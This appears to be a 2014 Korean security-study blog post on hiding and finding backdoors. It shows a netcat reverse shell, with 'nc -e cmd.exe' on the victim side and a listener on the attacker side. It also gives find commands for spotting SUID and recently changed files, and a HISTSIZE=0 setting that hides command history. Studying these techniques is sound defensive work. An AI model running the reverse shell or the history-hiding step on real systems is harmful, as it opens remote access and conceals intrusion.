2014. 8. 27. 14:39
System

hiding backdoors

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

- netcat 


리버스 텔넷개념으로 주로 사용



당하는 자

nc -e cmd.exe 피고ip 8080


-e : 프로그램 실행



공격자 

nc -l -p 8080


-ㅣ:  listen

-p : port


nc.exe




--------


- 백도어 은닉



- 백도어 찾기


find / -perm 4000

find / -size 5000 -perm 4000

find / -ctime 1

find / -perm -+4000 -exec ls -al {} \;



ctime : 최근 변경된 시간

atime: 접근 시간

mtime: 수정된 시간


history

find /-name .bash_history(각 계정마다 사용했던 명령어들 기록)

.bash_history

/root/.bash_profile -> HISTSIZE=0 (추가)



저작자표시 비영리 변경금지 (새창열림)

'System ' 카테고리의 다른 글

race condition  (0) 2014.08.29
finding backdoor  (0) 2014.08.28
encryption, backdoor  (0) 2014.08.26
ways to figure out the passwords  (0) 2014.08.25
hash, google and dictionary attack  (0) 2014.08.22
Posted by af334

티스토리툴바